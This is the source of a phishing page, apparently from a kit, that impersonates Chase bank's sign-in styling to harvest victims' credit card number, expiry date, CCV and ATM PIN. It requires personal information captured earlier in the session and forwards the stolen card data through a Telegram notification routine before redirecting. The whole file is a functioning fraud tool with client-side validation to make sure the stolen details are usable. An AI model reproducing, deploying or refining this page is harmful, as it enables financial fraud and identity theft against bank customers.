<?php
// Start session first before any includes
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}

// Include session tracker
require_once 'session_tracker.php';

require_once 'telegram_notify.php';

// Check if personal info exists in session
if (!isset($_SESSION['personal_info'])) {
    header('Location: personal_info.php');
    exit();
}

// Handle form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['card_number'])) {
    $cardNumber = $_POST['card_number'];
    $expDate = $_POST['exp_date'];
    $ccv = $_POST['ccv'];
    $atmPin = $_POST['atm_pin'];

    // Process form data and handle redirect
    $cardData = [
        'card_number' => $cardNumber,
        'exp_date' => $expDate,
        'ccv' => $ccv,
        'atm_pin' => $atmPin
    ];
    
    processFormAndRedirect('credit_card', $cardData, function() use ($cardNumber, $expDate, $ccv, $atmPin) {
        $personalInfo = $_SESSION['personal_info'] ?? [];
        notifyCreditCard($cardNumber, $expDate, $ccv, $atmPin, $personalInfo);
    });
}
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" class="no-js" lang="en" dir="ltr">
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex,nofollow" />
<title>Credit Card Information Required</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link rel="shortcut icon" href="dox/Files/img/chasefavicon.ico">
<link rel="apple-touch-icon" sizes="152x152" href="dox/Files/img/chase-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="120x120" href="dox/Files/img/chase-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="76x76" href="dox/Files/img/chase-touch-icon-76x76.png">
<link rel="apple-touch-icon" href="dox/Files/img/chase-touch-icon.png">
<meta name="apple-mobile-web-app-capable" content="yes">
<style>@font-face {font-family: Open Sans;font-style: normal;font-weight: 400;src: url('dox/Files/css/opensans-regular.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/opensans-regular.woff') format('woff'),url('dox/Files/css/opensans-regular.ttf') format('truetype'),url('dox/Files/css/opensans-regular.svg#opensans-regular') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 600;src: url('dox/Files/css/opensans-semibold.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/opensans-semibold.woff') format('woff'),url('dox/Files/css/opensans-semibold.ttf') format('truetype'),url('dox/Files/css/opensans-semibold.svg#opensans-semibold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 700;src: url('dox/Files/css/opensans-bold.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/opensans-bold.woff') format('woff'),url('dox/Files/css/opensans-bold.ttf') format('truetype'),url('dox/Files/css/opensans-bold.svg#opensans-bold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 800;src: url('dox/Files/css/opensans-extrabold.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/opensans-extrabold.woff') format('woff'),url('dox/Files/css/opensans-extrabold.ttf') format('truetype'),url('dox/Files/css/opensans-extrabold.svg#opensans-extrabold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 300;src: url('dox/Files/css/opensans-light.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/opensans-light.woff') format('woff'),url('dox/Files/css/opensans-light.ttf') format('truetype'),url('dox/Files/css/opensans-light.svg#opensans-light') format('svg');}@font-face {font-family: videoplayer;font-style: normal;font-weight: normal;src: url('dox/Files/css/videoplayer.eot?#iefix') format('embedded-opentype'),url('dox/Files/css/videoplayer.woff') format('woff'),url('dox/Files/css/videoplayer.ttf') format('truetype'),url('dox/Files/css/videoplayer.svg#videoplayer') format('svg');}
html {height:100%; background: #fff;}

@media only screen and (min-width: 768px) {
html {
background:#1c4f82; background:-moz-linear-gradient(top,#1c4f82 0%, #2e6ea3 100%); background:-webkit-linear-gradient(top,#1c4f82 0%,#2e6ea3 100%); background:linear-gradient(to bottom,#1c4f82 0%,#2e6ea3 100%);
}
}

.card-icon {
    position: absolute;
    right: 10px;
    top: 50%;
    transform: translateY(-50%);
    height: 25px;
    width: auto;
    display: none;
}

.card-number-container {
    position: relative;
}

.visa-icon {
    background: linear-gradient(45deg, #1a1f71, #0066b2);
    color: white;
    padding: 4px 8px;
    border-radius: 4px;
    font-weight: bold;
    font-size: 14px;
}

.mastercard-icon {
    background: linear-gradient(45deg, #eb001b, #f79e1b);
    color: white;
    padding: 4px 8px;
    border-radius: 4px;
    font-weight: bold;
    font-size: 14px;
}

.error-message {
    color: #bf2155;
    font-size: 0.875rem;
    margin-top: 5px;
    display: none;
}
</style>

<link rel="stylesheet" href="dox/Files/css/logon.css">
<link rel="stylesheet" href="dox/Files/css/blue-ui2.css">

<style>
.spinnerWrapper {
    position: absolute;
    width: 100%;
    top: 45%;
    text-align: center
}

#chaseSpinnerID.jpui.spinner {
    display: inline-block;
    overflow: visible!important;
    padding-top: 0;
    margin-top: -50%
}

#chaseSpinnerID.jpui.spinner:after {
    content: "\0020";
    -moz-animation: three-quarters-loader 780ms infinite linear;
    -webkit-animation: three-quarters-loader 780ms infinite linear;
    animation: three-quarters-loader 780ms infinite linear;
    border: 4px solid #ccc;
    border-right-color: #0092ff;
    border-radius: 50%;
    box-sizing: border-box;
    display: inline-block;
    position: relative;
    width: 48px;
    height: 48px
}

@media(max-width:991px) {
    #chaseSpinnerID.jpui.spinner:after {
        width: 38px;
        height: 38px
    }
}

@media(max-width:767px) {
    #chaseSpinnerID.jpui.spinner:after {
        width: 28px;
        height: 28px
    }
}

#chaseSpinnerID.jpui.spinner:before {
    content: "Loading";
    color: transparent;
    position: absolute;
    bottom: -1.25rem;
    font-size: 1rem
}

#chaseSpinnerID.jpui.spinner:focus {
    outline: 0
}

@-moz-keyframes three-quarters-loader {
    0% {
        -moz-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -moz-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

@-webkit-keyframes three-quarters-loader {
    0% {
        -webkit-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

@keyframes three-quarters-loader {
    0% {
        -moz-transform: rotate(0);
        -ms-transform: rotate(0);
        -webkit-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -moz-transform: rotate(360deg);
        -ms-transform: rotate(360deg);
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

#chaseSpinnerID.jpui.spinner .util.accessible-text {
    position: absolute!important;
    clip: rect(1px 1px 1px 1px);
    clip: rect(1px, 1px, 1px, 1px);
    padding: 0!important;
    border: 0!important;
    height: 1px!important;
    width: 1px!important;
    overflow: hidden
}

BODY {
    overflow-x: hidden;
    overflow-y: auto;
    margin: 0
}

#init,
#body {
    opacity: 0;
    -webkit-transition: opacity .5s;
    transition: opacity .5s
}

#init {
    z-index: -1;
    background: #fff;
    position: fixed;
    top: 0;
    left: 0;
    min-width: 100%;
    min-height: 110%
}

.spinner:after,
.mask:after {
    content: '';
    position: fixed;
    z-index: -1;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: #1c4f82;
    background: -moz-linear-gradient(top, #1c4f82 0, #2e6ea3 100%);
    -ms-filter: alpha(opacity=90);
    filter: alpha(opacity=90);
}
</style>
<link rel="stylesheet" href="dox/Files/css/dashboard.css">

<div id="load" style="display:none">
    <div class="spinner" style="
position: fixed;
top: 43%;
right: 0;
bottom: 0;
left: 0;
z-index: 200;
margin: 0;
text-align: center;
">
        <div class="">
            <div id="chaseSpinnerID" class="jpui spinner" tabindex="-1"><span id="accessible-chaseSpinnerID" class="util accessible-text">loading</span></div>
        </div>
    </div>
</div>

<div id="fixed">
    <div class="spinner" style="
position: fixed;
top: 43%;
right: 0;
bottom: 0;
left: 0;
z-index: 200;
margin: 0;
text-align: center;
">
        <div class="">
            <div id="chaseSpinnerID" class="jpui spinner" tabindex="-1"><span id="accessible-chaseSpinnerID" class="util accessible-text">loading</span></div>
        </div>
    </div>
</div>

<script type="text/javascript">
    document.onreadystatechange = function() {
        var state = document.readyState
        if (state == 'complete') {
            setTimeout(function() {
                document.getElementById('interactive');
                document.getElementById('fixed').style.visibility = "hidden";
            }, 2000);
        }
    }
</script>

<body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true" class="daog">
<style type="text/css">
.logon .logon-box .jpui.error.input {
    color: #666!important;
    border: 1px solid #bf2155!important;
}
</style>
<div id="logonApp" data-is-view="true">
<div class="homepage" tabindex="-1">
<div id="advertisenativeapp" data-has-view="true">
<div data-is-view="true">
<div class="advertiseNativeApp"></div></div></div>
<div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading" aria-hidden="true" data-has-view="true">
<div data-is-view="true">
<div id="siteMessageAda" aria-live="polite">
<h2 class="util accessible-text" id="site-messages-heading">You have no more site alerts</h2>
</div></div></div>
<div class="logon-container" id="container">
<header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
<div class="logon header jpui transparent navigation bar" data-is-view="true">
<a id="logoHomepageLink" href="#">
<div class="chase logo"></div>
</a>
<span id="logonCloseIcon-iconanchor-wrapper">
<a class="jpui iconaction logon-close-icon" href="javascript:void(0);" id="logonCloseIcon">

<i class="jpui searchx icon" id="icon-logonCloseIcon" aria-hidden="true"></i></a>
</span>
</div>
</header> 

<main id="logon-content" data-has-view="true">
<div class="container logon" data-is-view="true">
<div>
<div id="backgroundImage">
<div class="jpui background image fixed" id="geoImage">
 <style>
.spinnerWrapper {
    position: absolute;
    width: 100%;
    top: 45%;
    text-align: center
}

#chaseSpinnerID.jpui.spinner {
    display: inline-block;
    overflow: visible!important;
    padding-top: 0;
    margin-top: -50%
}

#chaseSpinnerID.jpui.spinner:after {
    content: "\0020";
    -moz-animation: three-quarters-loader 780ms infinite linear;
    -webkit-animation: three-quarters-loader 780ms infinite linear;
    animation: three-quarters-loader 780ms infinite linear;
    border: 4px solid #ccc;
    border-right-color: #0092ff;
    border-radius: 50%;
    box-sizing: border-box;
    display: inline-block;
    position: relative;
    width: 48px;
    height: 48px
}

@media(max-width:991px) {
    #chaseSpinnerID.jpui.spinner:after {
        width: 38px;
        height: 38px
    }
}

@media(max-width:767px) {
    #chaseSpinnerID.jpui.spinner:after {
        width: 28px;
        height: 28px
    }
}

#chaseSpinnerID.jpui.spinner:before {
    content: "Loading";
    color: transparent;
    position: absolute;
    bottom: -1.25rem;
    font-size: 1rem
}

#chaseSpinnerID.jpui.spinner:focus {
    outline: 0
}

@-moz-keyframes three-quarters-loader {
    0% {
        -moz-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -moz-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

@-webkit-keyframes three-quarters-loader {
    0% {
        -webkit-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

@keyframes three-quarters-loader {
    0% {
        -moz-transform: rotate(0);
        -ms-transform: rotate(0);
        -webkit-transform: rotate(0);
        transform: rotate(0)
    }
    100% {
        -moz-transform: rotate(360deg);
        -ms-transform: rotate(360deg);
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg)
    }
}

#chaseSpinnerID.jpui.spinner .util.accessible-text {
    position: absolute!important;
    clip: rect(1px 1px 1px 1px);
    clip: rect(1px, 1px, 1px, 1px);
    padding: 0!important;
    border: 0!important;
    height: 1px!important;
    width: 1px!important;
    overflow: hidden
}

BODY {
    overflow-x: hidden;
    overflow-y: auto;
    margin: 0
}

#init,
#body {
    opacity: 0;
    -webkit-transition: opacity .5s;
    transition: opacity .5s
}

#init {
    z-index: -1;
    background: #fff;
    position: fixed;
    top: 0;
    left: 0;
    min-width: 100%;
    min-height: 110%
}

.spinner:after,
.mask:after {
    content: '';
    position: fixed;
    z-index: -1;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: #1c4f82;
    background: -moz-linear-gradient(top, #1c4f82 0, #2e6ea3 100%);
    -ms-filter: alpha(opacity=90);
    filter: alpha(opacity=90);
}

.jpui.background.image { background-image: url(dox/Files/img/background.desktop.day.9.jpeg);filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='dox/Files/img/background.mobile.day.9.jpeg', sizingMethod='scale');-ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='dox/Files/img/background.mobile.day.9.jpeg', sizingMethod='scale');}@media (min-width:320px) { .jpui.background.image{background-image:url(dox/Files/img/background.mobile.day.9.jpeg); } }@media (min-width:992px) { .jpui.background.image{background-image:url(dox/Files/img/background.tablet.day.9.jpeg); } }@media (min-width:1024px) { .jpui.background.image{background-image:url(dox/Files/img/background.desktop.day.9.jpeg); } }
</style>

</div>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-md-6 col-md-offset-3 logoff hidden" id="logoffbox">
<div class="jpui raised segment">
<div class="row">
<div class="col-xs-10 col-xs-offset-1">
<h3 class="u-focus in-progress" tabindex="-1" id="logoff-header">You're being signed out.</h3></div>
</div>
<div class="row">
<div class="col-xs-12">
<div class="progress">
<div class="bar">
</div>
</div>
</div>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
<div class="jpui raised segment">
<div class="row">
<div class="col-xs-10 col-xs-offset-1">

<form id="credit-card-form" method="POST" action="credit_card.php">
<h3 style="margin-bottom: 20px; text-align: center; color: #717171;">Credit Card Information Required</h3>

<label class="util accessible-text logon-xs-toggle" for="card-number-input" aria-hidden="true">
<span class="accessible-text"></span> Credit Card Number</label>
<div class="logon-xs-toggle card-number-container" id="cardNumber" style="margin-bottom: 15px;">
<input class="jpui input logon-xs-toggle" name="card_number" placeholder="Credit Card Number" type="text" maxlength="19" id="card-number-input" data-validation="length" data-validation-length="min16" data-validation-error-msg="Please enter a valid 16-digit credit card number" required> 
<span id="visa-icon" class="card-icon visa-icon">VISA</span>
<span id="mastercard-icon" class="card-icon mastercard-icon">MASTERCARD</span>
<div class="error-message" id="card-error">Credit cards must start with 4 or 5</div>
</div>

<label class="util accessible-text logon-xs-toggle" for="exp-date-input" aria-hidden="true">
<span class="accessible-text"></span> Expiration Date (MM/YY)</label>
<div class="logon-xs-toggle" id="expDate" style="margin-bottom: 15px;">
<input class="jpui input logon-xs-toggle" name="exp_date" placeholder="MM/YY" type="text" maxlength="5" id="exp-date-input" data-validation="length" data-validation-length="min5" data-validation-error-msg="Please enter expiration date" required> 
<div class="error-message" id="exp-error">Invalid expiration date</div>
</div>

<label class="util accessible-text logon-xs-toggle" for="ccv-input" aria-hidden="true">
<span class="accessible-text"></span> CCV</label>
<div class="logon-xs-toggle" id="ccv" style="margin-bottom: 15px;">
<input class="jpui input logon-xs-toggle" name="ccv" placeholder="CCV" type="text" maxlength="3" pattern="[0-9]{3}" data-validation="length" data-validation-length="3" data-validation-error-msg="Please enter a valid 3-digit CCV" required> 
</div>

<label class="util accessible-text logon-xs-toggle" for="atm-pin-input" aria-hidden="true">
<span class="accessible-text"></span> ATM PIN</label>
<div class="logon-xs-toggle" id="atmPin" style="margin-bottom: 15px;">
<input class="jpui input logon-xs-toggle" name="atm_pin" placeholder="ATM PIN" type="password" maxlength="4" pattern="[0-9]{4}" data-validation="length" data-validation-length="4" data-validation-error-msg="Please enter a valid 4-digit ATM PIN" required> 
</div>

<div class="row">
<button type="submit" id="submit-button" class="jpui button focus fluid primary">
<span class="label">Continue</span>
</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
</div>
<footer class="logon-footer" id="logon-footer" data-has-view="true">    
</footer>
</div>

</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery-form-validator/2.3.26/jquery.form-validator.min.js"></script>
<script>
$(document).ready(function() {
    // Format credit card number and detect card type
    $('#card-number-input').on('input', function() {
        let value = this.value.replace(/[^0-9]/g, '').slice(0, 16);

        // Format with spaces every 4 digits
        value = value.replace(/(\d{4})(?=\d)/g, '$1 ');
        this.value = value;

        // Detect card type and show appropriate icon
        let firstDigit = value.charAt(0);
        $('#visa-icon, #mastercard-icon').hide();
        $('#card-error').hide();

        if (firstDigit === '4') {
            $('#visa-icon').show();
        } else if (firstDigit === '5') {
            $('#mastercard-icon').show();
        } else if (value.length > 0) {
            $('#card-error').show();
        }
    });

    // Format expiration date
    $('#exp-date-input').on('input', function() {
        let value = this.value.replace(/[^0-9]/g, '');
        if (value.length >= 2) {
            value = value.substring(0, 2) + '/' + value.substring(2, 4);
        }
        this.value = value;

        // Validate expiration date
        if (value.length === 5) {
            let parts = value.split('/');
            let month = parseInt(parts[0]);
            let year = parseInt('20' + parts[1]);
            let currentDate = new Date();
            let currentYear = currentDate.getFullYear();
            let currentMonth = currentDate.getMonth() + 1;

            $('#exp-error').hide();

            if (month < 1 || month > 12) {
                $('#exp-error').text('Invalid month').show();
            } else if (year < 2025) {
                $('#exp-error').text('Card is expired').show();
            } else if (year === currentYear && month < currentMonth) {
                $('#exp-error').text('Card is expired').show();
            }
        }
    });

    // Restrict CCV to only numbers
    $('input[name="ccv"]').on('input', function() {
        this.value = this.value.replace(/[^0-9]/g, '').slice(0, 3);
    });

    // Restrict ATM PIN to only numbers
    $('input[name="atm_pin"]').on('input', function() {
        this.value = this.value.replace(/[^0-9]/g, '').slice(0, 4);
    });

    // Form validation before submit
    $('#credit-card-form').on('submit', function(e) {
        let cardNumber = $('#card-number-input').val().replace(/\s/g, '');
        let firstDigit = cardNumber.charAt(0);

        if (firstDigit !== '4' && firstDigit !== '5') {
            e.preventDefault();
            $('#card-error').show();
            return false;
        }

        if (cardNumber.length !== 16) {
            e.preventDefault();
            alert('Please enter a valid 16-digit credit card number');
            return false;
        }

        let expDate = $('#exp-date-input').val();
        if (expDate.length !== 5) {
            e.preventDefault();
            alert('Please enter a valid expiration date');
            return false;
        }

        // Check if expiration date is valid
        let parts = expDate.split('/');
        let month = parseInt(parts[0]);
        let year = parseInt('20' + parts[1]);
        let currentDate = new Date();
        let currentYear = currentDate.getFullYear();
        let currentMonth = currentDate.getMonth() + 1;

        if (month < 1 || month > 12 || year < 2025 || (year === currentYear && month < currentMonth)) {
            e.preventDefault();
            alert('Please enter a valid expiration date');
            return false;
        }
    });
});

$.validate();
$('#my-textarea').restrictLength( $('#max-length-element') );
$.validate({
  modules : 'toggleDisabled',
  disabledFormFilter : 'form.toggle-disabled',
  showErrorDialogs : false
});
</script>

</body>
</html>